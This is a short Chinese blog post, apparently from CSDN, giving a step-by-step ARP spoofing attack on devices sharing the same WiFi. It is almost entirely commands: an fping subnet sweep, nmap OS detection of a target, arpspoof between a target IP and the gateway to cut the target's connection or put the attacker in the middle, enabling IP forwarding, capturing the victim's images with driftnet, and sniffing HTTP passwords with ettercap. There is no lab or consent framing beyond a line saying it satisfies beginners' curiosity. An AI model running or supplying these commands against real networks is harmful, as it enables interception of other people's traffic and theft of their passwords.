arp攻击
查看本机ip
使用指令ifconfig inet之后的便是IPV4地址
查一下和自己在同一WiFi下的其他设备
命令: fping -g -r 0 -s 192.168.31.48/24 | grep alive
进行目标IP系统探测(探测是什么系统:电脑or手机)
命令:nmap -T4 -O (目标IP)
arp断网攻击
命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1
形式:arpspoof -i eth0(一般虚拟机默认为此) -t 目标IP -r 网关
arp欺骗
查本机ip -------------- ifconfig
查和自己处在同一WiFi下的IP ------------ fping -g -r 0 -s 192.168.31.48/24 | grep alive
既然是欺骗,那就不能让目标主机断网,所以要更改配置文件
命令:echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
arp攻击
命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1
抓图片
driftnet -i eth0
实现密码嗅探
ettercap -Tq -i eth0
注意:图片嗅探会有延迟,没有想象中那么及时。
密码嗅探只能嗅探http的,https不行。
欢迎大家批评指正,本文仅供小白满足好奇心。
来源:CSDN
作者:duan_qiao925
链接:https://blog.csdn.net/duan_qiao925/article/details/104032431